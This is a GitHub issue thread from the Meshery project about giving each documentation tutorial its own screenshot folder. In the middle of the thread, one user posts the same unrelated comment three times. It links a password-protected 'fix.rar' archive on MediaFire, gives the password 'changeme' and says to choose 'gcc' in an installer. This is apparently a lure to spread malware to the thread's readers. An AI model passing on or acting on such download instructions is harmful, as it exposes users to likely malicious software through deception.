### ISSUE TITLE
[Docs] Tutorials : Organizing Tutorial Screenshots

### ISSUE THREAD

**Issue by khabdrick** [meshery/meshery#11805]
### Current State
I was working on a tutorial and I noticed that all the screenshots are placed in one folder irrespective of the tutorial. It'll be tedious for someone trying to contribute to the tutorial to find the images and update if needed.
![image](https://github.com/user-attachments/assets/4af720f7-021f-4125-a09a-cb6ec760fd5c)

### Desired State
- My suggestion is for every tutorial to have its own folder and all the screenshot will live there.
- Another thing we could do here is using descriptive file names, which will help with SEO and collaboration too.

**I can work on this!**

---

### Contributor [Guides](https://docs.meshery.io/project/contributing) and [Handbook](https://layer5.io/community/handbook)
- 📚 [Instructions for contributing to documentation](https://docs.meshery.io/project/contributing/contributing-docs)
   - Meshery documentation [site](https://docs.meshery.io/) and [source](https://github.com/meshery/meshery/tree/master/docs)
- 🛠 [Meshery Build & Release Strategy](https://docs.meshery.io/project/contributing/build-and-release)
- 🎨 Wireframes and [designs for Meshery UI](https://www.figma.com/file/SMP3zxOjZztdOLtgN4dS2W/Meshery-UI) in Figma [(open invite)](https://www.figma.com/team_invite/redeem/qJy1c95qirjgWQODApilR9)
- 🙋🏾🙋🏼 Questions: [Discussion Forum](http://discuss.meshery.io) and [Community Slack](https://slack.meshery.io)

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by khabdrick** [comment]
@amir1387aht what's this for?

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Pinkigupta05** [comment]
hey @khabdrick can i work on this issue ??

**Comment by aayushb2004** [comment]
@khabdrick Can you please assign this issue to me ?
